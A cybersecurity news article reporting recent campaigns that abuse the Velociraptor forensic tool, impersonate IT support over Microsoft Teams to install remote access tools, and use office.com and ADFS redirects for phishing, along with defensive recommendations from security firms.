Cybersecurity experts have uncovered a new wave of attacks where threat actors misuse legitimate software to infiltrate systems. One incident involved the open-source forensic tool Velociraptor, which was used to download and run Visual Studio Code, likely to establish a tunnel to a command-and-control server.
This tactic reflects a shift in cybercrime strategy. Instead of deploying custom malware, attackers are now leveraging trusted incident response tools to gain access and avoid detection. Investigators found that the attackers used the Windows msiexec utility to install Velociraptor via a Cloudflare Workers domain, then used encoded PowerShell commands to enable remote access and code execution.
Sophos warns that unauthorized use of Velociraptor should be treated as a potential precursor to ransomware. They recommend deploying endpoint detection systems, monitoring for unusual activity, and maintaining secure backups.
Meanwhile, researchers at Hunters and Permiso have reported a separate campaign targeting Microsoft Teams. Attackers impersonate IT support staff using fake or compromised accounts to trick users into installing remote access tools like AnyDesk or Quick Assist. These tools are then used to deliver PowerShell payloads capable of stealing credentials and executing malicious code.
The lures are designed to appear routine, such as help desk messages about system maintenance, making them harder to detect. Similar techniques have been used to spread malware families like DarkGate and Matanbuchus.
Victims are also being tricked into entering passwords through fake Windows prompts, which are then saved locally for theft. Security teams are advised to monitor Teams audit logs and educate users on spotting impersonation attempts.
In a related discovery, attackers have launched a malvertising campaign using legitimate office[.]com links and Active Directory Federation Services (ADFS) to redirect users to fake Microsoft 365 login pages. By configuring custom Microsoft tenants with ADFS, attackers can make malicious redirects appear legitimate, complicating detection efforts.
Push Security calls this a troubling development, as it allows phishing pages to bypass traditional URL-based defenses.
Found this article interesting? Follow us on X(Twitter) ,Threads and FaceBook to read more exclusive content we post.
